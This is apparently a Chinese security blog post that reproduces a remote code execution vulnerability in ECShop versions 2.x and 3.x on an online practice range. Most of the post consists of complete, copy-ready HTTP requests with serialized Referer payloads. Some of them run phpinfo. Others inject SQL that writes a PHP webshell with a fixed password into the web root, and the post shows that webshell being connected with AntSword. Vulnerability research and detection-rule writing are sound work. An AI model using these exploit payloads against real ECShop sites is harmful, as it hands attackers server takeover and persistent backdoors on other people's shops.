ECShop全版本远程代码执行漏洞

ECShop全版本远程代码执行漏洞

Posted by 看不尽的尘埃 on September 25, 2019

前言

最近在给公司写指纹规则、漏洞检测和利用规则,因此漏洞复现的文章更新会比较频繁。

0x00 漏洞介绍

  • 漏洞名称:ECShop 全版本 远程代码执行漏洞
  • CVE编号:N/A
  • 发布时间:2018-09-1
  • 漏洞说明:该漏洞可直接导致网站服务器沦陷,黑客可通过WEB攻击直接获得服务器权限,利用简单且危害较大。
  • 影响范围:2.x、3.x全版本
  • 修复建议:修改include/lib_insert.php文件中相关漏洞的代码,将$arr[id]和$arr[num]强制将数据转换成整型

0x01 环境搭建

这边我使用了在线靶场

图片

2.x Poc

请求user.php,对Referer字段进行替换或者增加,PoC是执行phpinfo()的:

POST /user.php HTTP/1.1
Host: 6f20dc3e7e2f04b19ce2d861e7fd7cc0.n2.vsgo.cloud:18570
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:110:"*/ union select 1,0x27202f2a,3,4,5,6,7,8,0x7b24616263275d3b6563686f20706870696e666f2f2a2a2f28293b2f2f7d,10-- -";s:2:"id";s:4:"' /*";}554fcae493e564ee0dc75bdf2ebf94ca

从下图可以看到成功执行了phpinfo: 图片

2.x EXP

下面的Referer是写入一句话木马的,会在网站根目录生成1.php,密码:1337。如果想要改的话,可以通过实验靶场的paper中的php代码生成一下自定义的后门和密码:

POST /user.php HTTP/1.1
Host: deb51ea82b23814b0aa6b5bc05268bfb.n2.vsgo.cloud:16741
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ECS_ID=99a65b781f6f0322d02e278e788c798dbe35f4fc; ECS[visit_times]=1
Content-Type: application/x-www-form-urlencoded
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}

从下图看虽然好像有报错,但是还是成功写入了一句话木马的: 图片

我们使用中国蚁剑去连接是没有任何问题的: 图片

3.x PoC

既然是全版本通杀,那么下面就来看一下3.x的PoC,老样子还是执行phpinfo的:

Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a

3.x EXP

3.x的EXP,也是老样子,会在网站根目录生成1.php,密码:1337。

Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:289:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a

0x02 指纹

我发现Cookie中存在一个非常关键的字段ECS_ID,暂且把这个特征当作Web指纹。

0x03 总结

发现自己对php序列化和反序列化知识了解太少,还是得在周末好好学习一下php反序列化的知识点,来加深对PHP序列号与反序列的理解。